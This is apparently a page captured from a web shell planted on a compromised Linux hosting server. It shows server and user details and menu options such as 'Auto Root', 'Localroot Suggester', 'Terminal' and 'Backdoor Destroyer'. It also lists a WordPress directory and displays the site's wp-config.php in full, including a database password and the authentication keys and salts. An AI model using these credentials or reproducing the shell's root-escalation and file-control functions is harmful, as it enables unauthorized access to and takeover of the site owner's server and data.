Linux host36.vpshosting.vn 5.14.0-611.47.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Apr 8 20:00:39 EDT 2026 x86_64
LiteSpeed
Server IP : 103.200.23.189 & Your IP : 216.73.217.121
Domains :
Cant Read [ /etc/named.conf ]
User : adbcom
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
adbcom /
preserve-20260430-2037 /
Delete
Unzip
Name
Size
Permission
Date
Action
luxe-child-theme
[ DIR ]
drwxr-xr-x
2026-05-18 14:58
luxe-core-plugin
[ DIR ]
drwxr-xr-x
2026-05-18 14:58
luxe-theme
[ DIR ]
drwxr-xr-x
2026-05-18 14:58
.htaccess
197
B
-r--r--r--
2026-05-18 14:58
wp-blog-header.php
2.74
KB
-rw-r--r--
2026-05-18 14:58
wp-config.php
3.47
KB
-rw-r--r--
2026-04-30 20:37
wp-cron.php
2.74
KB
-rw-r--r--
2026-05-18 14:58
Save
Rename
<?php //define('AUTOMATIC_UPDATER_DISABLED', true); /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/documentation/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'adbcom_singhouse' ); /** Database username */ define( 'DB_USER', 'adbcom_admin' ); /** Database password */ define( 'DB_PASSWORD', 'singhouse2024' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'et=)/B<0}ETZ2<cs+j>/0r,DIJ1P4{odMH4{m<|3eV$m@?L7~jh:iEDxq4,Mt~oT' ); define( 'SECURE_AUTH_KEY', 'Gc4y=o~d#i6Xg)1h/A)k0-3HyMqZOQOdB1qyC[U-B%u.rT[^!+ZNW|G|{qS;:s<D' ); define( 'LOGGED_IN_KEY', 'x(7n}@^B_+u<2fHzwOH.Ah&mx`=H*YGWk;]Z_v_VfT$lDzZ1%{*6k2p`>&I%}`$$' ); define( 'NONCE_KEY', 'J038A60n1o=c;wSA?qamK}!T8{[JI Ey6ips&vb<1jeM3/oAjR`/E|DbJg?gyTT>' ); define( 'AUTH_SALT', '?{F63-eeQSj~oeO$ON]0qTAO$<Oe&KIK!Yxua1J=Wfz7Jw2$=$H<mtde7LPVkBKa' ); define( 'SECURE_AUTH_SALT', 'AC*fE^H#:lI8[p{528 AXvkBi&pNh1[N[0ZNN)?]{hW&hZz9k`0:AAtrdKD]_g/D' ); define( 'LOGGED_IN_SALT', 'c#OXcsNB+G+_..}|6cuu`=aD/9lk= X,uL/-z0IR)G=B&7u/u_G-`Y5G:&o%p[R1' ); define( 'NONCE_SALT', 'oQe&X5xx`cIsMRj$z X4q!z`!Bf t3o5`&}SKy_I56I4jCy52G;K*MS9,wKPtjLz' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/documentation/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', true ); define( 'WP_DEBUG_LOG', true ); define( 'WP_DEBUG_DISPLAY', false); @ini_set( 'display_errors', 0 ); /* Add any custom values between this line and the "stop editing" line. */ //define('COOKIE_DOMAIN', $_SERVER['HTTP_HOST']); //define('COOKIEPATH', '/'); define( 'DISABLE_WP_CRON', true ); define( 'DISALLOW_FILE_EDIT', true ); define( 'CONCATENATE_SCRIPTS', false ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';